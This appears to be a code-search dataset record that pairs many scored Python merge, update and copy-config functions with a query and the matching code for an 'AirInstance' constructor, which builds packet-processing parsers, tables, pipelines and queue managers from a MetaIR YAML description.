project_namespace\n\n # Confirm project namespace\n if debug:\n print(\"Project Namespace: \" + cfg['generic']['project_namespace'])\n\n # Read overrides\n override_file_data = {}\n if os.path.isfile(self.override_file):\n with open(self.override_file, 'r') as stream:\n try:\n override_file_data = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n\n # Created merged data\n self.config_data = cfg\n # print(\"Applying override_file_data: \" + str(override_file_data))\n if override_file_data is not None:\n self.config_data = merge(self.config_data, override_file_data)\n\n # Ensure parent directory for merged file exists\n directory = Path(self.merged_file).parent\n if not os.path.exists(directory):\n os.makedirs(directory)\n # Created merged file\n with open(self.merged_file, 'w') as out_file:\n yaml.dump(self.config_data, out_file)", "def _merge_raw(self, other):\n if other is None:\n variables = OrderedDict(self.variables)\n else:\n # don't align because we already called xarray.align\n variables = merge_coords_without_align(\n [self.variables, other.variables])\n return variables", "def merge_contextual(self, other):\n # TODO: This is currently dependent on our data model? 
Make more robust to schema changes\n # Currently we assume all lists at Compound level, with 1 further potential nested level of lists\n for k in self.keys():\n # print('key: %s' % k)\n for item in self[k]:\n # print('item: %s' % item)\n for other_item in other.get(k, []):\n # Skip text properties (don't merge names, labels, roles)\n if isinstance(other_item, six.text_type):\n continue\n for otherk in other_item.keys():\n if isinstance(other_item[otherk], list):\n if len(other_item[otherk]) > 0 and len(item[otherk]) > 0:\n other_nested_item = other_item[otherk][0]\n for othernestedk in other_nested_item.keys():\n for nested_item in item[otherk]:\n if not nested_item[othernestedk]:\n nested_item[othernestedk] = other_nested_item[othernestedk]\n elif not item[otherk]:\n item[otherk] = other_item[otherk]\n log.debug('Result: %s' % self.serialize())\n return self", "def merge(self, other):\n self._mergeKeys(other)\n self._binaryOperationCheck(other)\n for id in self.clock.keys():\n print id\n self.clock[id] = max(self.clock[id], other.clock[id])", "def override_from_folder(self, other: ItemVariant) -> None:\n self.authors.extend(other.authors)\n self.tags.extend(self.tags)\n self.vbsp_config = lazy_conf.concat(self.vbsp_config, other.vbsp_config)\n self.desc = tkMarkdown.join(self.desc, other.desc)", "def merge(self, other):\n\n for child in other.children:\n self.add_deep_copy_of(child, merged=True)", "def copy_from_other(self, other):\n self.data = other.data\n self.url = other.url\n self.container_factory = other.container_factory", "def update_config(self, data):\n self.config.data = dict_merge(self.config.data, data)\n self.config.save()", "def merge(self, session, source_state, source_dict, dest_state,\n dest_dict, load, _recursive):\n\n pass", "def merge(self, other, allow_duplicate=False, do_spaces=True, do_datasets=True, do_tasksets=True, do_results=True):\n #TODO: May need to organize a staging area to ensure this merge is atomic\n if self.mode == 'r': raise ValueError, \"Cannot merge into read-only store\"\n ignored_md = ['uuid', 'avg_learn', 'avg_classify', 'name', 'feature_name', 'class_name']\n\n space_direct_copy = [] # Spaces we copy directly, meaning the featuremap can be copied too\n space_feature_mapping = {}\n if do_spaces or do_datasets:\n # Must do spaces if we do datasets, because spaces may have been updated\n for space_node in ProgressIter(list(other.spaces), label='Copying spaces'):\n logger.debug(\"Considering space '%s'\", space_node._v_name)\n space_name = space_node._v_name\n if hasattr(self.spaces, space_name):\n logger.debug('Already had %s', space_name)\n src_space = other.get_Space(space_name)\n # Need to merge these. Feature spaces can be extended, but there is no mechanism for doing the same with class\n # spaces at the moment, so we must reject any that do not match. \n dst_space = self.get_Space(space_name)\n if src_space == dst_space:\n logger.debug(' Exact match')\n space_direct_copy.append(space_name)\n else:\n md = get_metadata(space_node)\n if md['type'] == 'class':\n raise ValueError, \"Cannot merge due to different versions of %s\" % str(md)\n elif md['type'] == 'feature':\n logger.debug(' Attempting to merge %s', str(md))\n # Reconcile the spaces. 
\n ## First we need to compute the new features to add\n new_feats = sorted(set(src_space) - set(dst_space))\n logger.debug(' Identified %d new features', len(new_feats))\n reconciled_space = dst_space + new_feats\n if len(new_feats) != 0:\n # Only need to extend if new features are found.\n self.extend_Space(space_name, reconciled_space)\n ## Now we need to build the mapping from the external space to ours\n space_index = dict( (k,v) for v,k in enumerate(reconciled_space))\n space_feature_mapping[space_name] = dict( (i,space_index[s]) for i,s in enumerate(src_space))\n else:\n raise ValueError, \"Unknown type of space\"\n else:\n self.fileh.copyNode(space_node, newparent=self.spaces)\n space_direct_copy.append(space_name)\n \n if do_datasets:\n for src_ds in ProgressIter(list(other.datasets), label='Copying datasets'):\n dsname = src_ds._v_name\n\n logger.debug(\"Considering dataset '%s'\", dsname)\n if hasattr(self.datasets, dsname):\n logger.warning(\"already had dataset '%s'\", dsname)\n dst_ds = getattr(self.datasets, dsname)\n # Failure to match instance_id is an immediate reject\n if dst_ds._v_attrs.instance_space != src_ds._v_attrs.instance_space:\n raise ValueError, \"Instance identifiers don't match for dataset %s\" % dsname\n # The hardest to handle is the feature data, since we may need to rearrange feature maps\n else:\n instance_space = other.get_DatasetMetadata(dsname)['instance_space']\n self.add_Dataset(dsname, instance_space, other.get_Space(dsname))\n dst_ds = getattr(self.datasets, dsname)\n\n node_names = ['class_data', 'sequence', 'tokenstreams']\n for name in node_names:\n logger.debug('Copying %s',name)\n if hasattr(src_ds, name):\n src_parent = getattr(src_ds, name)\n #TODO: may need to handle incomplete destination nodes\n dst_parent = getattr(dst_ds, name)\n for node in src_parent:\n if hasattr(dst_parent, node._v_name):\n logger.warning(\"already had '%s' in '%s'\", node._v_name, name)\n else:\n self.fileh.copyNode(node, newparent=dst_parent, recursive=True)\n else:\n logger.warning(\"Source does not have '%s'\", name)\n\n logger.debug('Copying feature_data')\n for node in src_ds.feature_data:\n space_name = node._v_name\n if hasattr(dst_ds.feature_data, space_name):\n logger.warning(\"already had '%s' in 'feature_data'\", space_name) \n elif space_name in space_direct_copy:\n # Direct copy the feature data because the destination store did not have this\n # space or had exactly this space\n logger.debug(\"direct copy of '%s' in 'feature_data'\", space_name)\n self.fileh.copyNode(node, newparent=dst_ds.feature_data, recursive=True)\n else:\n ax0 = node.feature_map.read(field='ax0')\n ax1 = node.feature_map.read(field='ax1')\n value = node.feature_map.read(field='value')\n feature_mapping = space_feature_mapping[space_name]\n\n feat_map = [ (i,feature_mapping[j],v) for (i,j,v) in zip(ax0,ax1,value)]\n self.add_FeatureDict(dsname, space_name, feat_map)\n\n \n # TASKS & RESULTS\n def __merge(datum, check):\n logger.debug(\"Copying %s\", datum)\n src_node = getattr(other, datum)\n dst_node = getattr(self, datum)\n for t in ProgressIter(list(src_node), label='Copying %s' % datum):\n logger.debug(\"Considering %s '%s'\", datum, t._v_name)\n\n # Check if the exact result has been previously copied\n if t._v_name in dst_node:\n logger.warn(\"Skipping previous %s: %s\", datum, t._v_name)\n else:\n md = get_metadata(t)\n for i in ignored_md: \n if i in md: \n del md[i]\n # Check for equivalent metadata\n if not allow_duplicate and check(md):\n logger.warn(\"Ignoring 
duplicate in %s: %s\", datum, str(md))\n else:\n try:\n self.fileh.copyNode(t, newparent=dst_node, recursive=True)\n except tables.NoSuchNodeError:\n logger.critical(\"Damaged node skipped\")\n\n if do_tasksets:\n # Copy entire nodes\n __merge('tasksets', self.has_TaskSet)\n # Now work our way through and check if any weights need updating\n for src in ProgressIter(other.get_TaskSets({}), label='Copying weights'):\n if src.node._v_name in self.tasksets:\n dst = StoredTaskSet(self, getattr(self.tasksets, src.node._v_name))\n else:\n md = dict(src.metadata)\n for i in ignored_md: \n if i in md: \n del md[i]\n dst = self.get_TaskSet(md)\n # sanity check for compatibility\n if len(src.tasks) != len(dst.tasks):\n logger.warning('number of tasks in src and dst do not match; skipping')\n continue\n for i, task in enumerate(src.tasks):\n dst.tasks[i].weights.update(src.tasks[i].weights)\n\n if do_results:\n __merge('results', self.has_TaskSetResult)", "def merge(self, other):\n self._segments.extend(other._segments)\n self._segments.sort()", "def merge(self, other_btree):\n pass", "def merge(self: Dict[str, Arg], argument: Arg):\n dest = argument.destination\n if dest in self:\n self[dest].merge_all(argument)\n return\n self[dest] = argument", "def union(self, other: Catalog) -> Catalog:\n cat = self.copy()\n oth_cp = other.copy()\n\n for k in oth_cp.keys():\n for ver_id, version in oth_cp[k].versions.items():\n cat[k][ver_id] = version\n return cat", "def merge_two_dicts(self, x, y):\n z = x.copy()\n z.update(y)\n return z", "def merge(self, other: \"GraphSet\") -> None:\n if other.name != self.name:\n raise UnmergableGraphSetsException(\n f\"Unable to merge graph with name {other.name} into {self.name}\"\n )\n if other.version != self.version:\n raise UnmergableGraphSetsException(\n f\"Unable to merge graph with version {other.version} into {self.version}\"\n )\n self.start_time = min(self.start_time, other.start_time)\n self.end_time = max(self.end_time, other.end_time)\n self.resources += other.resources\n self._resolve_duplicates()\n self.errors += other.errors\n self.stats.merge(other.stats)", "def _extend(self, other):\n for key, value in list(other.entries.items()):\n self._add_entry(key, value)", "def replace_config(a, b):\n a.update(b)\n return a", "def mergeWith(self, others):", "def extend(self, other_rollout):\n\n assert not self.is_terminal()\n assert all(k in other_rollout.fields for k in self.fields)\n for k, v in other_rollout.data.items():\n self.data[k].extend(v)\n self.last_r = other_rollout.last_r", "def update(self, other):\n self._start = other._start\n self._end = other._end\n self._nodes = {k: v.copy() for k,v in other._nodes.iteritems()}\n self._edges = {k: set(v) for k,v in other._edges.iteritems()}\n self._names = set(other._names)\n self.current = other.current", "def merge(self, other):\n extras = other.difference(self)\n if len(extras) > 0:\n self.update(extras)\n self.reset()\n return True\n return False", "def merge_config(self_config, indict):\n\n self_config.merge(indict)\n patch_config(self_config, indict)", "def merge_working_sets(self, other):\n\n for dist in other.by_key.values(): self.add(dist)\n return self", "def merge_results(self, other_processor):\n if not isinstance(other_processor, self.__class__):\n raise ValueError(f\"Can only extend with another \"\n f\"{self.__class__.__name__} instance.\")\n\n # Where there is overlap, there _should_ be agreement.\n self._evidence_counts.update(other_processor._evidence_counts)\n 
self._source_counts.update(other_processor._source_counts)\n self._belief_scores.update(other_processor._belief_scores)\n\n # Merge the statement JSONs.\n for k, sj in other_processor.__statement_jsons.items():\n if k not in self.__statement_jsons:\n self.__statement_jsons[k] = sj # This should be most of them\n else:\n # This should only happen rarely.\n for evj in sj['evidence']:\n self.__statement_jsons[k]['evidence'].append(evj)\n\n # Recompile the statements\n self._compile_results()\n return", "def merge_jupyter_config_data(self, config, in_config):\n self.log.debug(f\"\"\"[lite][config][merge] ..... {config}\"\"\")\n self.log.debug(f\"\"\"[lite][config][merge] ..... {in_config}\"\"\")\n\n config = config or {}\n in_config = in_config or {}\n\n for k, v in in_config.items():\n if k in [DISABLED_EXTENSIONS, FEDERATED_EXTENSIONS]:\n config[k] = [*config.get(k, []), *v]\n elif k in [SETTINGS_OVERRIDES]:\n config[k] = config.get(k, {})\n for pkg, pkg_config in v.items():\n config[k][pkg] = config[k].get(pkg, {})\n config[k][pkg].update(pkg_config)\n else:\n config[k] = v\n self.log.debug(f\"\"\"[lite][config][merge] ..... {config}\"\"\")\n return config", "def merge_jupyter_config_data(self, config, in_config):\n self.log.debug(f\"\"\"[lite][config][merge] ..... {config}\"\"\")\n self.log.debug(f\"\"\"[lite][config][merge] ..... {in_config}\"\"\")\n\n config = config or {}\n in_config = in_config or {}\n\n for k, v in in_config.items():\n if k in [DISABLED_EXTENSIONS, FEDERATED_EXTENSIONS]:\n config[k] = [*config.get(k, []), *v]\n elif k in [SETTINGS_OVERRIDES]:\n config[k] = config.get(k, {})\n for pkg, pkg_config in v.items():\n config[k][pkg] = config[k].get(pkg, {})\n config[k][pkg].update(pkg_config)\n else:\n config[k] = v\n self.log.debug(f\"\"\"[lite][config][merge] ..... 
{config}\"\"\")\n return config", "def merge_content(self, other):\n self.__content += other.__content", "def merge(target, source):\n for key, value in source.items():\n if key not in target:\n target[key] = value\n elif type(target[key]) is dict:\n if key in self.OVERRIDE_ON_EXTENDS:\n target[key].update(value)\n else:\n merge(target[key], value)\n elif type(target[key]) is list:\n target[key] += value\n return target", "def merge(self, new_store):\n if new_store.name and len(new_store.name) > 0:\n self.name = new_store.name\n if new_store.address and len(new_store.address) > 0:\n self.address = new_store.address\n if new_store.city and len(new_store.city) > 0:\n self.city = new_store.city\n if new_store.state and len(new_store.state) > 0:\n self.state = new_store.state\n if new_store.zip and new_store.zip > 0:\n self.zipcode = new_store.zip\n if new_store.phone and new_store.phone > 0:\n self.phone = new_store.phone", "def array_merge(a1, a2, inplace=False, empty_source=False): \n if inplace:\n out = a1\n else:\n out = copy.deepcopy(a1)\n if empty_source:\n for i in range(len(out)):\n out.pop()\n for k in a2:\n out[k] = a2[k]\n return out", "def update(self, other: dict):\n for key in other:\n if key in self:\n self[key] = other[key]", "def merge_graph(self, other):\n self.add_nodes( (nLabel,nInfo) for nLabel,nInfo in other.nodes() )\n \n for nLabel,nInfo in other.nodes():\n for edgeLabel,edgeInfo in other.edgesFrom(nLabel):\n self.add_edge(edgeLabel,edgeInfo)", "def _merge_two_config(user_cfg, default_cfg):\n if type(user_cfg) is not edict:\n return\n for key, val in user_cfg.iteritems():\n # Since user_cfg is a sub-file of default_cfg\n if not default_cfg.has_key(key):\n raise KeyError('{} is not a valid config key'.format(key))\n\n if type(default_cfg[key]) is not type(val):\n if isinstance(default_cfg[key], np.ndarray):\n val = np.array(val, dtype=default_cfg[key].dtype)\n else:\n raise ValueError(\n 'Type mismatch ({} vs. {}) '\n 'for config key: {}'.format(type(default_cfg[key]),\n type(val), key))\n # Recursive merge config\n if type(val) is edict:\n try:\n _merge_two_config(user_cfg[key], default_cfg[key])\n except:\n print 'Error under config key: {}'.format(key)\n raise\n else:\n default_cfg[key] = val", "def merge_nmap_services(d1, d2):\n new = d1['host']['nmap_services_py']\n old = d2['host']['nmap_services_py']\n new_address = new['addresses'][0]\n old['hostnames'].extend(new['hostnames'])\n old['hostnames'] = list(set(old['hostnames']))\n old['addresses'].append(new_address)\n old['addresses'] = list(set(old['addresses']))\n old['services'][new_address] = new['services'][new_address]\n # Ignoring os and uptime as they should not diff.\n if VERBOSE:\n logger.info('Host %s merged in to %s.' 
% (new_address, d2['host']['name']))\n d2['host']['nmap_services_py'] = old\n return d2", "def merge_annotation(self, other_seg):\n try:\n assert isinstance(other_seg, SFFSegmentation)\n except AssertionError:\n print_date(_encode(u\"Invalid type for other_seg: {}\".format(type(other_seg)), u'utf-8'))\n sys.exit(65)\n # global data\n self.name = other_seg.name\n self.software = other_seg.software\n self.global_external_references = other_seg.global_external_references\n self.details = other_seg.details\n # loop through segments\n for segment in self.segments:\n other_segment = other_seg.segments.get_by_id(segment.id)\n segment.biological_annotation = other_segment.biological_annotation\n segment.complexes_and_macromolecules = other_segment.complexes_and_macromolecules", "def osl_fill_from(self, other):\n #TODO: What about inherited properties?\n for p in self._osl.properties:\n conditional_copy(other, self, p[0])\n return self", "def mergeData(oldData, newData):\n for key, value in newData.iteritems():\n if isinstance(value, (dict,)):\n if key in oldData:\n assert isinstance(oldData[key], ConfigDict), \\\n \"%r in %r is not a ConfigDict\" % (oldData[key], oldData)\n else:\n oldData[key] = {}\n mergeData(oldData[key], value)\n else:\n oldData[key] = value", "def combine(self, existing):\n return self", "def extend(self, other):\n overlap = [key for key in other.defaults if key in self.defaults]\n if overlap:\n raise ValueError(\n \"Duplicate hyperparameter(s): %s\" % \" \".join(overlap))\n new = dict(self.defaults)\n new.update(other.defaults)\n return HyperparameterDefaults(**new)", "def _merge(config, env):\n if 'common' in config and env in config:\n c = config['common'].copy()\n c.update(config[env])\n elif env in config.keys():\n c = config[env]\n elif 'common' in config.keys():\n c = config['common']\n else:\n c = config\n return c", "def updateFromContext(self, other):\n value = self.valueType.set(self.value, other.value)\n self.set(value)\n self.origins.extend(other.origins)", "def merge(self, hps, overwrite=True):\n if isinstance(hps, HyperParameters):\n hps = hps.space\n for hp in hps:\n self._retrieve(\n hp.name,\n hp.__class__.__name__,\n hp.get_config(),\n overwrite=overwrite)", "def merge(self, other: PerfData):\n self.total_samples += other.total_samples\n if self.total_time == 0.0:\n self.total_time = other.total_time\n self.compile_time = max(self.compile_time, other.compile_time)\n self.programming_time = max(\n self.programming_time, other.programming_time\n )\n if self.est_samples_per_sec == 0.0:\n self.est_samples_per_sec = other.est_samples_per_sec\n else:\n assert (\n self.est_samples_per_sec == other.est_samples_per_sec\n ), \"Expected all fabric-based performance estimates to be identical\"\n\n if self.total_time > 0:\n self.samples_per_sec = float(self.total_samples) / self.total_time\n else:\n self.samples_per_sec = 0.0", "def copyDataFrom (self, other):\n\n self.outErrorPackets=other.outErrorPackets\n self._myHasOutErrorPackets=other._myHasOutErrorPackets\n \n self.inErrorPackets=other.inErrorPackets\n self._myHasInErrorPackets=other._myHasInErrorPackets\n \n self.inDiscardPackets=other.inDiscardPackets\n self._myHasInDiscardPackets=other._myHasInDiscardPackets\n \n self.outUnicastPackets=other.outUnicastPackets\n self._myHasOutUnicastPackets=other._myHasOutUnicastPackets\n \n self.inMulticastPackets=other.inMulticastPackets\n self._myHasInMulticastPackets=other._myHasInMulticastPackets\n \n self.outBroadcastPackets=other.outBroadcastPackets\n 
self._myHasOutBroadcastPackets=other._myHasOutBroadcastPackets\n \n self.inBroadcastPackets=other.inBroadcastPackets\n self._myHasInBroadcastPackets=other._myHasInBroadcastPackets\n \n self.outMulticastPackets=other.outMulticastPackets\n self._myHasOutMulticastPackets=other._myHasOutMulticastPackets\n \n self.inUnknownProtocolPackets=other.inUnknownProtocolPackets\n self._myHasInUnknownProtocolPackets=other._myHasInUnknownProtocolPackets\n \n self.outDiscardPackets=other.outDiscardPackets\n self._myHasOutDiscardPackets=other._myHasOutDiscardPackets\n \n self.inUnicastPackets=other.inUnicastPackets\n self._myHasInUnicastPackets=other._myHasInUnicastPackets\n \n self.outOctets=other.outOctets\n self._myHasOutOctets=other._myHasOutOctets\n \n self.inOctets=other.inOctets\n self._myHasInOctets=other._myHasInOctets", "def merge_datasets(self, other):\r\n if isinstance(other, SpatialDataFrame) and \\\r\n other.geometry_type == self.geometry_type:\r\n return pd.concat(objs=[self, other], axis=0)\r\n elif isinstance(other, DataFrame):\r\n return pd.concat(objs=[self, other], axis=0)\r\n elif isinstance(other, Series):\r\n self['merged_datasets'] = other\r\n elif isinstance(other, SpatialDataFrame) and \\\r\n other.geometry_type != self.geometry_type:\r\n raise ValueError(\"Spatial DataFrames must have the same geometry type.\")\r\n else:\r\n raise ValueError(\"Merge datasets cannot merge types %s\" % type(other))", "def copy(self):\n new = super().copy()\n new.drip_cal_config = deepcopy(self.drip_cal_config)\n new.drip_config = deepcopy(self.drip_config)\n new.pipecal_config = deepcopy(self.pipecal_config)\n return new", "def copyAttributes(self, other, add_nxpars=False):\n import copy\n \n self.setTitle(other.getTitle())\n self.setDataSetType(other.getDataSetType())\n self.setAllAxisLabels(other.getAllAxisLabels())\n self.setAllAxisUnits(other.getAllAxisUnits())\n self.setYLabel(other.getYLabel())\n self.setYUnits(other.getYUnits())\n if len(self.attr_list.keys()) == 0:\n self.attr_list = copy.copy(other.attr_list)\n else:\n self.attr_list.instrument = copy.copy(other.attr_list.instrument)\n self.attr_list.sample = copy.copy(other.attr_list.sample)\n\n if add_nxpars:\n nxpar_keys = [item[0] for item in self.attr_list.iteritems() \\\n if isinstance(item[1], NxParameter)]\n\n for nxpar_key in nxpar_keys:\n self.attr_list[nxpar_key] += other.attr_list[nxpar_key]\n else:\n # Do nothing\n pass\n \n keys_to_get = [other_key for other_key in other.attr_list \\\n if other_key not in self.attr_list]\n \n for key_to_get in keys_to_get:\n self.attr_list[key_to_get] = \\\n copy.copy(other.attr_list[key_to_get])", "def apply_merge_config(\n self, config: str, dry_run: Optional[bool] = True\n ):\n result = self.nornir.run(\n task=self.napalm_config_run,\n name='Merge config to device',\n dry_run=dry_run,\n replace=False,\n configuration=config\n )\n\n # Fix up return Currently == None\n return result", "def merge(self, strn):\n\t\tif strn.name == self.name:\n\t\t\tfor run, val in strn.items():\n\t\t\t\tself.val[run] = val", "def merge(self, a, b, path=None):\n if path is None: path = []\n for key in b:\n if key in a:\n if isinstance(a[key], dict) and isinstance(b[key], dict):\n if key == 'attributes':\n self.merge_attribute_defs(b, a)\n else:\n self.merge(a[key], b[key], path + [str(key)])\n elif a[key] == b[key]:\n pass # same leaf value\n else:\n # raise Exception('Conflict at %s' % '.'.join(path + [str(key)]))\n self.append_or_replace(a,b,key, '/'.join(path + [str(key)]));\n else:\n a[key] = b[key]\n return 
a", "def merge_struct_arrays(self, data1, data2):\n data_final = np.concatenate((data1, data2))\n return data_final", "def _merge_inplace(self, other):\n if other is None:\n yield\n else:\n # don't include indexes in priority_vars, because we didn't align\n # first\n priority_vars = OrderedDict(\n (k, v) for k, v in self.variables.items() if k not in self.dims)\n variables = merge_coords_without_align(\n [self.variables, other.variables], priority_vars=priority_vars)\n yield\n self._update_coords(variables)", "def PassData(self, other):\n for this,that in zip(self.DataSet, other.DataSet):\n for assoc in [ArrayAssociation.POINT, ArrayAssociation.CELL, ArrayAssociation.ROW]:\n if this.HasAttributes(assoc) and that.HasAttributes(assoc):\n this.GetAttributes(assoc).PassData(that.GetAttributes(assoc))", "def merge_algorithm_configs(\n cls,\n config1: AlgorithmConfigDict,\n config2: PartialAlgorithmConfigDict,\n _allow_unknown_configs: Optional[bool] = None,\n ) -> AlgorithmConfigDict:\n config1 = copy.deepcopy(config1)\n if \"callbacks\" in config2 and type(config2[\"callbacks\"]) is dict:\n deprecation_warning(\n \"callbacks dict interface\",\n \"a class extending rllib.algorithms.callbacks.DefaultCallbacks; \"\n \"see `rllib/examples/custom_metrics_and_callbacks.py` for an example.\",\n error=True,\n )\n\n if _allow_unknown_configs is None:\n _allow_unknown_configs = cls._allow_unknown_configs\n return deep_update(\n config1,\n config2,\n _allow_unknown_configs,\n cls._allow_unknown_subkeys,\n cls._override_all_subkeys_if_type_changes,\n cls._override_all_key_list,\n )", "def combine_dict(self, dict2):\n # iterate through smaller data set\n # base_set will be the larger set and is used for updating\n if len(self.content[\"values\"]) > len(dict2[\"values\"]):\n large_set = self.content[\"values\"]\n small_set = dict2[\"values\"]\n base_set = self.content\n else:\n small_set = self.content[\"values\"]\n large_set = dict2[\"values\"]\n base_set = dict2\n\n subset = {}\n for key in small_set.keys():\n # determine wether to compare keys\n if key in large_set:\n updated_l = large_set[key][\"updated_at\"]\n updated_s = small_set[key][\"updated_at\"]\n if updated_l == 'NULL':\n if updated_s != 'NULL':\n # update to not NULL set\n # if both updated_at are NULL, things\n # are ambiguos. We could defer to created_at\n # but for simplicity we will default to\n # the values in the larger set\n subset[key] = small_set[key]\n else:\n if updated_s == 'NULL':\n # update to not NULL set\n subset[key] = large_set[key]\n else:\n if updated_l > updated_s:\n subset[key] = large_set[key]\n else:\n subset[key] =small_set[key]\n else:\n subset[key] = small_set[key]\n base_set[\"values\"].update(subset)\n new_obj = BackupData()\n new_obj.load_from_dict(base_set)\n return new_obj", "def copy(self, **kwargs):\n # type: (...) 
-> SalusConfig\n return deepcopy(self).update(**kwargs)", "def extend(self, other):\n if len(self.vertices[0]) != len(other.vertices[0]):\n raise ValueError(\"Rank mismatch ({0} != \"\n \"{1})\".format(self.vertices.shape[1],\n other.vertices.shape[1]))\n if self._geotype != other._geotype:\n raise TypeError(\"Geometry mismatch ({0} != \"\n \"{1})\".format(self._geotype, other._geotype))\n\n self.vertices = np.vstack([self.vertices, other.vertices])\n self._cache = {}\n return self", "def update_inplace_from(self, other):\n self.__dict__ = other.__dict__.copy()", "def merge(self, db2):\n delta_db = Database(db2)\n\n # Find common headers between the master and delta databases\n common_headers = [x for x in self.headers if x in delta_db.headers]\n\n # Any new headers found in the delta are added to the master\n self.headers.extend(\n [x for x in delta_db.headers if x not in self.headers])\n\n if len(common_headers) < 1:\n print(\"No shared headers were found. These files cannot be merged.\")\n else:\n key = ''\n # Skip picker prompt if there is only one common header\n if len(common_headers) == 1:\n key = common_headers[0]\n else:\n key = self.headerpicker(common_headers)\n\n # Create a temp list for new records to be added to\n records_temp = list(self.records)\n\n # Iterate over new records and attempt to match to existing record\n for each in delta_db.records:\n record = self.fetch_record(key, each, records_temp)\n if record:\n record.attributes.update(each.attributes)\n\n self.records = records_temp\n print(\"Merge successful!\\n\")", "def _overwrite_with_config(self, new_cfg):\n for section in new_cfg.sections():\n for key, val in new_cfg.items(section):\n self.config.set(section, key, val)", "def mergeConfig(self):\n config = \\\n \"from Configuration.DataProcessing.Merge import mergeProcess\\nprocess = mergeProcess(\\n \"\n config += \",\".join(self.merge_inputs)\n config += \",\\n\"\n config += \" output_file = \\\"%s\\\",\\n\" % os.path.basename(self.lfn)\n config += \" output_lfn = \\\"%s\\\"\\n) \" % self.lfn\n return config", "def concat(self: TAvalancheDataset, other: TAvalancheDataset) -> TAvalancheDataset:\n return self.__class__([self, other])", "def reset_cfg():\n _C.merge_from_other_cfg(_CFG_DEFAULT)", "def __finalize__(self, other, method=None, **kwargs):\n self = super().__finalize__(other, method=method, **kwargs)\n # merge operation: using metadata of the left object\n if method == \"merge\":\n for name in self._metadata:\n print(\"self\", name, self.au_columns, other.left.au_columns)\n object.__setattr__(self, name, getattr(other.left, name, None))\n # concat operation: using metadata of the first object\n elif method == \"concat\":\n for name in self._metadata:\n object.__setattr__(self, name, getattr(other.objs[0], name, None))\n return self", "def copyDataFrom (self, other):\n\n self.localTimeString=other.localTimeString\n self._myHasLocalTimeString=other._myHasLocalTimeString\n \n self.utcTimeString=other.utcTimeString\n self._myHasUtcTimeString=other._myHasUtcTimeString\n \n self.daylightSavingTime=other.daylightSavingTime\n self._myHasDaylightSavingTime=other._myHasDaylightSavingTime\n \n self.epoch=other.epoch\n self._myHasEpoch=other._myHasEpoch\n \n self.utcOffsetMinutes=other.utcOffsetMinutes\n self._myHasUtcOffsetMinutes=other._myHasUtcOffsetMinutes", "def _merge_a_into_b(a, b):\n if type(a) is not edict:\n return\n\n for k, v in a.iteritems():\n # a must specify keys that are in b\n if not b.has_key(k):\n raise KeyError('{} is not a valid config 
key'.format(k))\n\n # the types must match, too\n old_type = type(b[k])\n if old_type is not type(v):\n if isinstance(b[k], np.ndarray):\n v = np.array(v, dtype=b[k].dtype)\n else:\n raise ValueError(('Type mismatch ({} vs. {}) '\n 'for config key: {}').format(type(b[k]),\n type(v), k))\n\n # recursively merge dicts\n if type(v) is edict:\n try:\n _merge_a_into_b(a[k], b[k])\n except:\n print('Error under config key: {}'.format(k))\n raise\n else:\n b[k] = v" ]
[ "0.68907833", "0.67463917", "0.6724158", "0.6697968", "0.6695578", "0.66716415", "0.635137", "0.6323535", "0.6313957", "0.628166", "0.62575287", "0.62176895", "0.6143152", "0.611059", "0.61058307", "0.6072944", "0.60497296", "0.5980816", "0.59184533", "0.5873966", "0.5863279", "0.5831473", "0.58241314", "0.57776827", "0.5775701", "0.5771427", "0.5765825", "0.5764409", "0.5756699", "0.5736825", "0.57337356", "0.5708465", "0.5695675", "0.56681585", "0.5659177", "0.56502336", "0.5645864", "0.56340915", "0.5611818", "0.5610291", "0.5605811", "0.5604163", "0.55949205", "0.5590668", "0.55882734", "0.55775195", "0.55645764", "0.5562489", "0.5558372", "0.5554382", "0.5549427", "0.55492955", "0.55491936", "0.55426216", "0.5530909", "0.5520933", "0.5493835", "0.54902756", "0.54728967", "0.54668736", "0.54668736", "0.5463607", "0.5445405", "0.5442351", "0.54243505", "0.5423991", "0.54233426", "0.5421142", "0.54168534", "0.5412695", "0.54085016", "0.5407924", "0.540759", "0.5399552", "0.53993034", "0.53829485", "0.5368911", "0.5355699", "0.53511775", "0.53492343", "0.53402096", "0.53392756", "0.5337514", "0.53341603", "0.53201795", "0.5317996", "0.5315299", "0.52927184", "0.5285277", "0.52833915", "0.5277982", "0.52696407", "0.52485496", "0.52449775", "0.52434385", "0.5234084", "0.5226558", "0.52235574", "0.52089", "0.5208047", "0.52022386" ]
0.0
-1
AirInstance constructor name The name of the instance input An object with the YAML description of the IR instance transmit_handler A function to be called to transmit pkts Add support to allow the specification of the MetaIR instance
def __init__(self, name, input, transmit_handler): local_dir = os.path.dirname(os.path.abspath(__file__)) MetaIRInstance.__init__(self, os.path.join(local_dir, 'air_meta.yml')) self.transmit_handler = transmit_handler self.name = name self.tm_started = False self.disabled = True # Add the content to the MetaIR instance self.add_content(input) self.port_count = self.meta_ir_object_map["layout"]["port_count"] # Create the AIR objects: parsers, actinos, tables, pipelines and TMs self.air_value_set = {} self.air_value_map = {} self.air_parser = {} self.air_action = {} self.air_table = {} self.air_pipeline = {} self.air_traffic_manager = {} self.processors = {} self.transmit_processor = TransmitProcessor(transmit_handler) for name, val in self.value_set.items(): self.air_value_set[name] = [] # Just use a list for name, val in self.value_map.items(): self.air_value_map[name] = {} # Just use a dict for name, val in self.parser.items(): self.air_parser[name] = Parser(name, val, self.parse_state, self.header, self.value_set) self.processors[name] = self.air_parser[name] for name, val in self.action.items(): self.air_action[name] = Action(name, val) for name, val in self.table.items(): self.air_table[name] = Table(name, val, self.air_action) for name, val in self.control_flow.items(): self.air_pipeline[name] = Pipeline(name, val, self.air_table, self.air_action) self.processors[name] = self.air_pipeline[name] for name, val in self.traffic_manager.items(): self.air_traffic_manager[name] = SimpleQueueManager(name, val, self.port_count) self.processors[name] = self.air_traffic_manager[name] # Plumb the layout layout = self.meta_ir_object_map["layout"] meta_ir_assert(layout["format"] == "list", "Unsupported layout: not a list") layout_name_list = layout["implementation"] meta_ir_assert(isinstance(layout_name_list, list), "Layout implementation is not a list") proc_count = len(layout_name_list) for idx, processor_name in enumerate(layout_name_list): cur_proc = self.processors[processor_name] if idx == 0: logging.debug("Layout: First processor %s" % cur_proc.name) self.first_processor = cur_proc if idx < proc_count - 1: next_proc = self.processors[layout_name_list[idx + 1]] cur_proc.next_processor = next_proc else: # Last one connects to transmit processor cur_proc.next_processor = self.transmit_processor logging.debug("Layout %s to %s" % (cur_proc.name, cur_proc.next_processor.name)) # Grab table initialization object if present self.table_initialization = {} ext_objs = 